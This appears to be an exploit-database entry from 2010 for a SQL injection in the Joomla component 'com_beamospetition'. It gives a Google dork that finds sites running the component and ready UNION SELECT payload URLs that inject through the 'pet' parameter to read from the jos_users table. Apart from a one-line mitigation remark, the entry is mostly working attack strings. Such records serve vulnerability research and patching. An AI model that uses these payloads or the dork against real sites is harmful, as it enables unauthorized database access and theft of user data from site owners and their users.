header-logo
Suggest Exploit
vendor:
com_beamospetition
by:
Forza-Dz
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_beamospetition
Affected Version From: All Versions
Affected Version To: All Versions
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win Sp2 and Mac
2010

Joomla “com_beamospetition” Sql Injection Vulnerability

The component "com_beamospetition" is vulnerable to SQL Injection. An attacker can inject arbitrary SQL queries by manipulating the "pet" parameter in the URL. For example, http://www.site.com/path/index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users--

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title : Joomla "com_beamospetition" Sql Injection Vulnerability 
# Date : 29 - 7 - 2010 
# Author : Forza-Dz
# Vendor : http://code.joomla.org/gf/project/beamospetition/frs/
# Version : All Versions 
# Tested on : Win Sp2 and Mc
############################################################
Dork = inurl:"com_beamospetition"
############################################################
--- SQL Injection Vulenrability --- 
SQL Injection Vulenrability component "com_beamospetition" 
http://www.site.com/path/index.php?option=com_beamospetition&startpage=3&pet=1[SQL]
############################################################
===[Injection]===
[SQL] = +Union+select+1--
############################################################
===[ Exploit ]===
http://www.site.com/path/index.php?option=com_beamospetition&startpage=3&pet=-1
+Union+select+user()+from+jos_users--
############################################################
Greetz @ Flit0x-Dz AnD MCA-CRB All "DZ" "MusliM" 
############################################################